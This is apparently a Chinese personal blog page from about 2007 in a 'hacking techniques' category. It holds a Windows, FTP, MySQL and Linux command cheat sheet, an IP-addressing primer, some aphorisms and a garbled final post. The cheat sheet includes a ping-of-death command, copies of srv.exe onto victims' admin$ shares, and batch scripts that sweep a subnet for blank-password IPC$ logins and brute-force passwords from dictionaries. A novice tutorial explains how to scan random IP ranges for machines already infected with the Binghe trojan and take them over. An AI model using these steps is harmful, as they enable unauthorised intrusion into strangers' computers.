    tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
    ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
    ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
    ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
    tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
    kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
    del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
    del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
    move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
    fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
    at id号 开启已注册的某个计划任务
    at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
    at id号 /delete 停止某个已注册的计划任务
    at 查看所有的计划任务
    at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
    finger username @host 查看最近有哪些用户登陆
    telnet ip 端口 远和登陆服务器,默认端口为23
    open ip 连接到IP(属telnet登陆后的命令)
    telnet 在本机上直接键入telnet 将进入本机的telnet
    copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
    copy c:\srv.exe $">\\ip\admin$ 复制本地c:\srv.exe到对方的admin下
    cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
    copy $\svv.exe">\\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
    xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
    tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
    tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
    ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
    route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
    arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
    start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
    mem 查看cpu使用情况
    attrib 文件名(目录名) 查看某文件(目录)的属性
    attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
    dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
    date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
    set 指定环境变量名称=要指派给变量的字符 设置环境变量
    set 显示当前所有的环境变量
    set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
    pause 暂停批处理程序,并显示出:请按任意键继续....
    if 在批处理程序中执行条件处理(更多说明见if命令及变量)
    goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
    call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
    for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
    echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
    echo 信息 在屏幕上显示出信息
    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
    find 文件名 查找某文件
    title 标题名字 更改CMD窗口标题名字
    color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
    prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
    print 文件名 打印文本文件
    ver 在DOS窗口下显示版本信息
    winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
    md 目录名 创建目录
    replace 源文件 要替换文件的目录 替换文件
    ren 原文件名 新文件名 重命名文件名
    tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
    type 文件名 显示文本文件的内容
    more 文件名 逐屏显示输出文件
    doskey 要锁定的命令=字符
    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
    taskmgr 调出任务管理器
    chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
    tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
    exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
    path 路径\可执行文件的文件名 为可执行文件设置一个路径。
    cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
    regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
    regedit /e 注册表文件名 导出注册表
    cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
    cacls 文件名 查看文件的访问用户权限列表
    REM 文本内容 在批处理文件中添加注解
    netsh 查看或更改本地网络配置情况
    IIS服务命令:
    iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
    iisreset /start或stop 启动(停止)所有Internet服务
    iisreset /restart 停止然后重新启动所有Internet服务
    iisreset /status 显示所有Internet服务状态
    iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动
    iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机
    iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
    iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
    FTP 命令: (后面有详细说明内容)
    ftp的命令行格式为:
    ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
    -d 使用调试方式。
    -n 限制ftp的自动登录,即不使用.netrc文件。
    -g 取消全局文件名。
    help [命令] 或 ?[命令] 查看命令说明
    bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
    pwd 列出当前远端主机目录
    put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
    get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
    mget [remote-files] 从远端主机接收一批文件至本地主机
    mput local-files 将本地主机中一批文件传送至远端主机
    dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
    ascii 设定以ASCII方式传送文件(缺省值)
    bin 或 image 设定以二进制方式传送文件
    bell 每完成一次文件传送,报警提示
    cdup 返回上一级目录
    close 中断与远程服务器的ftp会话(与open对应)
    open host[port] 建立指定ftp服务器连接,可指定连接端口
    delete 删除远端主机中的文件
    mdelete [remote-files] 删除一批文件
    mkdir directory-name 在远端主机中建立目录
    rename [from] [to] 改变远端主机中的文件名
    rmdir directory-name 删除远端主机中的目录
    status 显示当前FTP的状态
    system 显示远端主机系统类型
    user user-name [password] [account] 重新以别的用户名登录远端主机
    open host [port] 重新建立一个新的连接
    prompt 交互提示模式
    macdef 定义宏命令
    lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
    chmod 改变远端主机的文件权限
    case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
    cd remote-dir 进入远程主机目录
    cdup 进入远程主机目录的父目录
    ! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
    MYSQL 命令:
    mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
    (例:mysql -h110.110.110.110 -Uroot -P123456
    注:u与root可以不用加空格,其它也一样)
    exit 退出MYSQL
    mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
    grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
    show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
    use mysql;
    show tables; 显示库中的数据表
    describe 表名; 显示数据表的结构
    create database 库名; 建库
    use 库名;
    create table 表名 (字段设定列表); 建表
    drop database 库名;
    drop table 表名; 删库和删表
    delete from 表名; 将表中记录清空
    select * from 表名; 显示表中的记录
    mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。
    win2003系统下新增命令(实用部份):
    shutdown /参数 关闭或重启本地或远程主机。
    参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。
    例:shutdown /r /t 0 立即重启本地主机(无延时)
    taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
    参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
    tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
    参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。
    Linux系统下基本命令: 要区分大小写
    uname 显示版本信息(同win2K的 ver)
    dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
    pwd 查询当前所在的目录位置
    cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
    cat 文件名 查看文件内容
    cat >abc.txt 往abc.txt文件中写上内容。
    more 文件名 以一页一页的方式显示一个文本文件。
    cp 复制文件
    mv 移动文件
    rm 文件名 删除文件,rm -a 目录名删除目录及子目录
    mkdir 目录名 建立目录
    rmdir 删除子目录,目录内没有文档。
    chmod 设定档案或目录的存取权限
    grep 在档案中查找字符串
    diff 档案文件比较
    find 档案搜寻
    date 现在的日期、时间
    who 查询目前和你使用同一台机器的人以及Login时间地点
    w 查询目前上机者的详细资料
    whoami 查看自己的帐号名称
    groups 查看某人的Group
    passwd 更改密码
    history 查看自己下过的命令
    ps 显示进程状态
    kill 停止某进程
    gcc 黑客通常用它来编译C语言写的文件
    su 权限转换为指定使用者
    telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
    ftp ftp连接上某服务器(同win2K)
    附:批处理命令与变量
    1:for命令及变量 基本格式:
    FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。
    批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use $">\\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3
    (set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1}
    command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
    command_parameters:为特定命令指定参数或命令行开关
    IN (set):指在(set)中取值;DO command :指执行command
    参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取完为止{(set)为文件时,如(d:\pass.txt)时}。
    用法举例:
    @echo off
    echo 用法格式:test.bat *.*.* > test.txt
    for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
    存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
    /L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
    @echo off
    echo 用法格式:ok.bat ip
    FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
    存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。

    查看(190) 评论(0) 收藏 分享 圈子 管理

  • IP地址从头说起

    2007-01-15 13:42:15

    IP地址从头说起

    2007-01-14 17:23:22 / 个人分类:黑客技术

    随着电脑技术的逐步普及和因特网技术的迅猛发展,学习因特网、利用因特网已不再是那些腰缠万贯的大款和戴者深度眼睛的专业技术人员的专利,它已作为二十一世纪人类的一种新的生活方式而逐步深入到寻常百姓家。谈到因特网,IP地址就不能不提,因为无论是从学习还是使用因特网的角度来看,IP地址都是一个十分重要的概念,INTERNET的许多服务和特点都是通过IP地址体现出来的。

    一、IP地址的概念  
      我们知道因特网是全世界范围内的计算机联为一体而构成的通信网络的总称。联在某个网络上的两台计算机之间在相互通信时,在它们所传送的数据包里都会含有某些附加信息,这些附加信息就是发送数据的计算机的地址和接受数据的计算机的地址。象这样,人们为了通信的方便给每一台计算机都事先分配一个类似我们日常生活中的电话号码一样的标识地址,该标识地址就是我们今天所要介绍的IP地址。根据TCP/IP协议规定,IP地址是由32位二进制数组成,而且在INTERNET范围内是唯一的。例如,某台联在因特网上的计算机的IP地址为:

    11010010 01001001 10001100 00000010

    很明显,这些数字对于人来说不太好记忆。人们为了方便记忆,就将组成计算机的IP地址的32位二进制分成四段,每段8位,中间用小数点隔开,然后将每八位二进制转换成十进制数,这样上述计算机的IP地址就变成了:210.73.140.2。

    二、IP地址的分类  
      我们说过因特网是把全世界的无数个网络连接起来的一个庞大的网间网,每个网络中的计算机通过其自身的IP地址而被唯一标识的,据此我们也可以设想,在INTERNET上这个庞大的网间网中,每个网络也有自己的标识符。这与我们日常生活中的电话号码很相像,例如有一个电话号码为0515163,这个号码中的前四位表示该电话是属于哪个地区的,后面的数字表示该地区的某个电话号码。与上面的例子类似,我们把计算机的IP地址也分成两部分,分别为网络标识和主机标识。同一个物理网络上的所有主机都用同一个网络标识,网络上的一个主机(包括网络上工作站、服务器和路由器等)都有一个主机标识与其对应?IP地址的4个字节划分为2个部分,一部分用以标明具体的网络段,即网络标识;另一部分用以标明具体的节点,即主机标识,也就是说某个网络中的特定的计算机号码。例如,盐城市信息网络中心的服务器的IP地址为210.73.140.2,对于该IP地址,我们可以把它分成网络标识和主机标识两部分,这样上述的IP地址就可以写成:

    网络标识:210.73.140.0

    主机标识:     2        

    合起来写:210.73.140.2

    由于网络中包含的计算机有可能不一样多,有的网络可能含有较多的计算机,也有的网络包含较少的计算机,于是人们按照网络规模的大小,把32位地址信息设成三种定位的划分方式,这三种划分方法分别对应于A类、B类、C类IP地址。


    1.A类IP地址

      一个A类IP地址是指,在IP地址的四段号码中,第一段号码为网络号码,剩下的三段号码为本地计算机的号码。如果用二进制表示IP地址的话,A类IP地址就由1字节的网络地址和3字节主机地址组成,网络地址的最高位必须是“0”。A类IP地址中网络的标识长度为7位,主机标识的长度为24位,A类网络地址数量较少,可以用于主机数达1600多万台的大型网络。


    2.B类IP地址

      一个B类IP地址是指,在IP地址的四段号码中,前两段号码为网络号码,B类IP地址就由2字节的网络地址和2字节主机地址组成,网络地址的最高位必须是“10”。B类IP地址中网络的标识长度为14位,主机标识的长度为16位,B类网络地址适用于中等规模规模的网络,每个网络所能容纳的计算机数为6万多台。


    3.C类IP地址

      一个C类IP地址是指,在IP地址的四段号码中,前三段号码为网络号码,剩下的一段号码为本地计算机的号码。如果用二进制表示IP地址的话,C类IP地址就由3字节的网络地址和1字节主机地址组成,网络地址的最高位必须是“110”。C类IP地址中网络的标识长度为21位,主机标识的长度为8位,C类网络地址数量较多,适用于小规模的局域网络,每个网络最多只能包含254台计算机。

      除了上面三种类型的IP地址外,还有几种特殊类型的IP地址,TCP/IP协议规定,凡IP地址中的第一个字节以“lll0”开始的地址都叫多点广播地址。因此,任何第一个字节大于223小于240的IP地址是多点广播地址;IP地址中的每一个字节都为0的地址(“0.0.0.0”)对应于当前主机;IP地址中的每一个字节都为1的IP地址(“255.255.255.255”)是当前子网的广播地址;IP地址中凡是以“llll0”的地址都留着将来作为特殊用途使用;IP地址中不能以十进制“127”作为开头,27.1.1.1用于回路测试,同时网络ID的第一个6位组也不能全置为“0”,全“0”表示本地网络。

    三、IP的寻址规则  
       1.网络寻址规则

       A、 网络地址必须唯一。

       B、 网络标识不能以数字127开头。在A类地址中,数字127保留给内部回送函数。

       C、 网络标识的第一个字节不能为255。数字255作为广播地址。

       D、 网络标识的第一个字节不能为“0”,“0”表示该地址是本地主机,不能传送。

       2.主机寻址规则

       A、主机标识在同一网络内必须是唯一的。

       B、主机标识的各个位不能都为“1”,如果所有位都为“1”,则该机地址是广播地址,而非主机的地址。

       C、主机标识的各个位不能都为“0”,如果各个位都为“0”,则表示“只有这个网络”,而这个网络上没有任何主机。

    四、IP子网掩码概述  
      

    1.子网掩码的概念

      子网掩码是一个32位地址,用于屏蔽IP地址的一部分以区别网络标识和主机标识,并说明该IP地址是在局域网上,还是在远程网上。


    2.确定子网掩码数

      用于子网掩码的位数决定于可能的子网数目和每个子网的主机数目。在定义子网掩码前,必须弄清楚本来使用的子网数和主机数目。

      定义子网掩码的步骤为:

      A、确定哪些组地址归我们使用。比如我们申请到的网络号为 “210.73.a.b”,该网络地址为c类IP地址,网络标识为“210.73”,主机标识为“a.b”。

      B、根据我们现在所需的子网数以及将来可能扩充到的子网数,用宿主机的一些位来定义子网掩码。比如我们现在需要12个子网,将来可能需要16个。用第三个字节的前四位确定子网掩码。前四位都置为“1”,即第三个字节为“11110000”,这个数我们暂且称作新的二进制子网掩码。

      C、把对应初始网络的各个位都置为“1”,即前两个字节都置为“1”,第四个字节都置为“0”,则子网掩码的间断二进制形式为:“11111111.11111111.11110000.00000000”

      D、把这个数转化为间断十进制形式为:“255.255.240.0”

    这个数为该网络的子网掩码。


    3.IP掩码的标注

      A、无子网的标注法

      对无子网的IP地址,可写成主机号为0的掩码。如IP地址210.73.140.5,掩码为255.255.255.0,也可以缺省掩码,只写IP地址。

      B、有子网的标注法

      有子网时,一定要二者配对出现。以C类地址为例。

      1.IP地址中的前3个字节表示网络号,后一个字节既表明子网号,又说明主机号,还说明两个IP地址是否属于一个网段。如果属于同一网络区间,这两个地址间的信息交换就不通过路由器。如果不属同一网络区间,也就是子网号不同,两个地址的信息交换就要通过路由器进行。例如:对于IP地址为210.73.140.5的主机来说,其主机标识为00000101,对于IP地址为210.73.140.16的主机来说它的主机标识为00010000,以上两个主机标识的前面三位全是000,说明这两个IP地址在同一个网络区域中,这两台主机在交换信息时不需要通过路由器进行10.73.60.1的主机标识为00000001,210.73.60.252的主机标识为11111100,这两个主机标识的前面三位000与011不同,说明二者在不同的网络区域,要交换信息需要通过路由器。其子网上主机号各为1和252。

      2.掩码的功用是说明有子网和有几个子网,但子网数只能表示为一个范围,不能确切讲具体几个子网,掩码不说明具体子网号,有子网的掩码格式(对C类地址):

    五、IP的其他事项  
      1.一般国际互联网信息中心在分配IP地址时是按照网络来分配的,因此只有说到网络地址时才能使用A类、B类、C类的说法;

      2.在分配网络地址时,网络标识是固定的,而计算机标识是可以在一定范围内变化的,下面是三类网络地址的组成形式:

    A类地址:73.0.0.0

    B类地址:160.153.0.0

    C类地址:210.73.140.0

    上述中的每个0均可以在0~255之间进行变化。

      3.因为IP地址的前三位数字已决定了一个IP地址是属于何种类型的网络,所以A类网络地址将无法再分成B类IP地址,B类IP地址也不能再分成C类IP地址。

      4.在谈到某一特定的计算机IP地址时不宜使用A类、B类、C类的说法,但可以说主机地址是属于哪一个A类、B类、C类网络了。

      通过上面的学习,大家对IP地址肯定有了了解。有了IP地址大家就可以发送电子邮件了,并且可以获得Internet网上的其他信息,例如可以获得Internet上的WWW服务、BBS服务、FTP服务等等。

     

    查看(110) 评论(0) 收藏 分享 圈子 管理

  • 十三步简单侵入个人电脑

    2007-01-15 13:37:10

    菜鸟都学会 十三步简单入侵个人电脑 ~回帖哈~

    这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的网络新手们,Let's go!  
      第一步

      下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。

      下载完毕并解压缩之后跟我进行第二步!

      第二步

      运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。

      第三步

      在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。

      第四步

      进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。

      好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。

      第五步

      观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。

      下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。

      第六步

      点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。

      第七步

      在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。

      好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。

      第八步

      这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。

      第九步

      点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!!

      第十步

      你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:

      1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!

      2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!!

      第十一步

      如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。

      第十二步

      如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功!

      第十三步

      终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了

    查看(291) 评论(1) 收藏 分享 圈子 管理

  • 随感

    2006-12-28 11:39:24

    1,记住该记住的,忘记该忘记的。改变能改变的,接受不能改变的。
    2,能冲刷一切的除了眼泪,就是时间,以时间来推移感情,时间越长,冲突越淡,仿佛不断稀释的茶
    3,怨言是上天得至人类最大的供物,也是人类祷告中最真诚的部分。
    4,    智慧的代价是矛盾。这是人生对人生观开的玩笑。
    5,    世上的姑娘总以为自己是骄傲的公主(除了少数极丑和少数极聪明的姑娘例外)。
    6,如果敌人让你生气,那说明你还没有胜他的把握;如果朋友让你生气,那说明你仍然在意他的友情。
    7,    日出东海落西山,愁也一天,喜也一天;遇事不钻牛角尖,人也舒坦,心也舒坦。
    8,令狐冲说“有些事情本身我们无法控制,只好控制自己。”
    9,我不知道我现在做的哪些是对的,那些是错的,而当我终于老死的时候我才知道这些。所以我现在所能做的就是尽力做好每一件事,然后等待着老死。
    10,也许有些人很可恶,有些人很卑鄙。而当我设身为他想象的时候,我才知道:他比我还可怜。所以请原谅所有你见过的人,好人或者坏人。
    11,    鱼对水说你看不到我的眼泪,因为我在水里.水说我能感觉到你的眼泪,因为你在我心里。
    12,    快乐要有悲伤作陪,雨过应该就有天晴。如果雨后还是雨,如果忧伤之后还是忧伤.请让我们从容面对这离别之后的离别。微笑地去寻找一个不可能出现的你!
    13,    死亡教会人一切,如同考试之后公布的结果——虽然恍然大悟,但为时晚矣~!
    14,    你出生的时候,你哭着,周围的人笑着;你逝去的时候,你笑着,而周围的人在哭!一切都是轮回!!!! 我们都在轮回中!!!!
    15,    男人在结婚前觉得适合自己的女人很少,结婚后觉得适合自己的女人很多。
    16,于千万人之中,遇见你所遇见的人;于千万年之中,时间的无涯荒野里,没有早一步,也没有晚一步,刚巧赶上了。
    17,    每个人都有潜在的能量,只是很容易:被习惯所掩盖,被时间所迷离,被惰性所消磨。
    18,    人生短短几十年,不要给自己留下了什么遗憾,想笑就笑,想哭就哭,该爱的时候就去爱,无谓压抑自己。
    19,《和平年代》里的话:当幻想和现实面对时,总是很痛苦的。要么你被痛苦击倒,要么你把痛苦踩在脚下。
    20,真正的爱情是不讲究热闹不讲究排场不讲究繁华更不讲究嚎头的。
    21,    生命中,不断地有人离开或进入。于是,看见的,看不见的;记住的,遗忘了。生命中,不断地有得到和失落。于是,看不见的,看见了;遗忘的,记住了。然而,看不见的,是不是就等于不存在?记住的,是不是永远不会消失?
    22,    我们确实活得艰难,一要承受种种外部的压力,更要面对自己内心的困惑。在苦苦挣扎中,如果有人向你投以理解的目光,你会感到一种生命的暖意,或许仅有短暂的一瞥,就足以使我感奋不已。
    23,我不去想是否能够成功,既然选择了远方,便只顾风雨兼程;我不去想,身后会不会袭来寒风冷雨,既然目标是地平线,留给世界的只能是背影。
    24,后悔是一种耗费精神的情绪。后悔是比损失更大的损失,比错误更大的错误,所以不要后悔。

    查看(10) 评论(0) 收藏 分享 圈子 管理

  • 黑客技术

    2006-12-20 21:33:30







    使

    使









    1











    ctrl+home home



    ctrl+homectrl+F10 CTRL+F2



    ctrl+alt+shift+F6













    2

    99%







    使







    1



    2



    3200098

    XP



    4